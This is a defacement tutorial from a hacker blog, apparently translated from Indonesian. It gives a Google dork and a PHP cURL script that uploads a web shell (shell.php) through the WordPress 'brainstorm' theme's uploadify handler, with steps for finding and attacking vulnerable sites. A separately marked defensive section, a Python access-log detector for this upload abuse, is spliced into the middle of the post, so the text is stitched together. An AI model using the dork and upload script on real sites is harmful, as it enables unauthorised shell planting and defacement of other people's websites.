Assalamualaikum :v
Back again with me, the handsome Mr.3RR0R
This time I will go through a deface tutorial using "Wordpress themes brainstorm"
No idea whether this exploit is new or old, I just found it on a neighbouring blog :v
OK, let's get straight to it, study the tutorial below
Dork:
inurl:/wp-content/themes/brainstorm
CSRF :
<?php
$uploadfile="shell.php";
$ch = curl_init("www.contoh.com/[path]/wp-content/themes/brainstorm/functions/jwpanel/scripts/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/wordpress/wp-content/themes/brainstorm/functions/jwpanel/scripts/uploadify/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
First, use the dork above on Google
Once you have a result, the vulnerable path is shown below
www.contoh.com/(path)/wp-content/themes/brainstorm/functions/jwpanel/scripts/uploadify/uploadify.php
If the picture looks like this, it is vulnerable :v
If the picture looks like that, all that remains is to use the CSRF above, run it with xampp :v .
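For defenders, the requests described above leave a recognisable trace in the web server access log. The following is an added example, not part of the original post, that flags that trace in common/combined-format logs; the function name, sample log lines, IP addresses and the file name x.php are constructed for illustration, and it generalises from the brainstorm theme to any theme or plugin that ships an uploadify handler.

```python
import re

# Request fields of a common/combined-format access log line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
# The uploadify handler inside any theme or plugin, not only brainstorm.
HANDLER_RE = re.compile(
    r'^(?P<dir>.*?/wp-content/(?:themes|plugins)/[^/]+/.*?uploadify/)'
    r'uploadify\.php$', re.IGNORECASE)
SCRIPT_RE = re.compile(r'\.(?:php\d?|phtml|phar)$', re.IGNORECASE)


def find_uploadify_abuse(lines):
    """Return (kind, client_ip, path) findings in log order."""
    findings = []
    upload_dirs = set()  # directories whose handler accepted a POST
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a parsable request line
        path = m["path"].split("?", 1)[0]
        handler = HANDLER_RE.match(path)
        if handler:
            if m["method"] != "POST":
                kind = "handler_probe"
            elif m["status"].startswith("2"):
                kind = "upload_accepted"
                upload_dirs.add(handler["dir"].lower())
            else:
                kind = "upload_rejected"
            findings.append((kind, m["ip"], path))
        elif SCRIPT_RE.search(path):
            # Assumption: the upload lands beside the handler, as the
            # 'folder' value in the post's request specifies.
            parent = path.rsplit("/", 1)[0].lower() + "/"
            if parent in upload_dirs:
                findings.append(("script_in_upload_dir", m["ip"], path))
    return findings


# Constructed sample log (documentation IP ranges, made-up file name).
BASE = "/blog/wp-content/themes/brainstorm/functions/jwpanel/scripts/uploadify/"
SAMPLE = [
    f'198.51.100.7 - - [10/Mar/2024:10:00:01 +0000] "GET {BASE}uploadify.php HTTP/1.1" 200 1',
    f'198.51.100.7 - - [10/Mar/2024:10:00:05 +0000] "POST {BASE}uploadify.php HTTP/1.1" 200 1',
    f'198.51.100.7 - - [10/Mar/2024:10:00:09 +0000] "GET {BASE}x.php?c=1 HTTP/1.1" 200 52',
    f'203.0.113.9 - - [10/Mar/2024:10:01:00 +0000] "GET /blog/wp-content/themes/brainstorm/style.css HTTP/1.1" 200 900',
]
```

Any "upload_accepted" or "script_in_upload_dir" finding on a production site warrants removing the uploadify handler from the theme and reviewing the directory for files that do not belong to it.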
OK, that's all. If anything is unclear, please leave a comment below :D
Happy Enjoy :D
Wassalamualaikum :v
Source : TKJ Cyber Art
Thanks To : PhantomGhost - Sulawesi IT Sec
Facebook : https://www.facebook.com/marselERROR
Fanspage : https://mobile.facebook.com/Mr3RR0R-1605930586394122/